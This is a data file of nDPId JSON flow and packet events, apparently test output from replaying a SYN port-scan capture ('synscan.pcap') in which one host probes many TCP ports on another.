-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1765,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsRx0AACwG1VWsEAAIQA2GNIzTD57dU4MZAAAAAGACBAAk7gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1766,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsiHkAADAGj\/msEAAIQA2GNIzTJw7dU4MZAAAAAGACBAANfgAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/NkAADgGE5msEAAIQA2GNIzTw1LdU4MZAAAAAGACBABxOQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAs6hsAAC0GMVesEAAIQA2GNIzTC8PdU4MZAAAAAGACCAAkyQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1769,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsyFEAAC4GUiGsEAAIQA2GNIzTC7vdU4MZAAAAAGACDAAg0QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsTisAADAGykesEAAIQA2GNIzTGzndU4MZAAAAAGACBAAZUwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":25735,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1771,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsfmAAADIGmBKsEAAIQA2GNIzTZIfdU4MZAAAAAGACDADIBAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061104,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_packet_id":1,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061104,"pkt":"ACYLMQczACWzv5HuCABFAAAsDm4AADsG\/wSsEAAIQA2GNIzTGvXdU4MZAAAAAGACEAANlwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1494,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1773,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAseEgAADoGliqsEAAIQA2GNIzSBdbdUoMYAAAAAGACDAAmuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1774,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAsyqkAADcGRsmsEAAIQA2GNIzSFxfdUoMYAAAAAGACEAAReAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061105,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061105,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1775,"flow_packet_id":1,"flow_last_seen":1278275061105,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061105,"pkt":"ACYLMQczACWzv5HuCABFAAAs+dQAACUGKZ6sEAAIQA2GNIzSgALdUoMYAAAAAGACCACwjAAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":63331,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1776,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBNYAADsGCJ2sEAAIQA2GNIzS92PdUoMYAAAAAGACEAAxKwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAs6IMAADgGJ++sEAAIQA2GNIzSBZrdUoMYAAAAAGACBAAu9QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZcAADAGytusEAAIQA2GNIzSE8XdUoMYAAAAAGACBAAgygAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1779,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsBk8AADcGCySsEAAIQA2GNIzSB\/3dUoMYAAAAAGACEAAgkgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061107,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_packet_id":1,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061107,"pkt":"ACYLMQczACWzv5HuCABFAAAsHVIAADEG+iCsEAAIQA2GNIzSA4\/dUoMYAAAAAGACCAAtAAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1781,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsbqwAACgGscasEAAIQA2GNIzSF6vdUoMYAAAAAGACBAAc5AAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1198,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1782,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsF7gAACwGBLusEAAIQA2GNIzSBK7dUoMYAAAAAGACBAAv4QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1783,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqY8AADIGbOOsEAAIQA2GNIzSIzPdUoMYAAAAAGACDAAJXAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1784,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsf8MAADYGkq+sEAAIQA2GNIzSBizdUoMYAAAAAGACDAAmYwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1785,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsUswAACYGz6asEAAIQA2GNIzSB\/jdUoMYAAAAAGACDAAklwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6123,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1786,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7CMAACwGME+sEAAIQA2GNIzSF+vdUoMYAAAAAGACBAAcpAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsccoAADkGnaisEAAIQA2GNIzSDvTdUoMYAAAAAGACCAAhmwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1788,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEQAADMGbS6sEAAIQA2GNIzSII3dUoMYAAAAAGACEAAIAgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1789,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6oAACoGrsisEAAIQA2GNIzSH1bdUoMYAAAAAGACDAANOQAAAgQFtA=="} 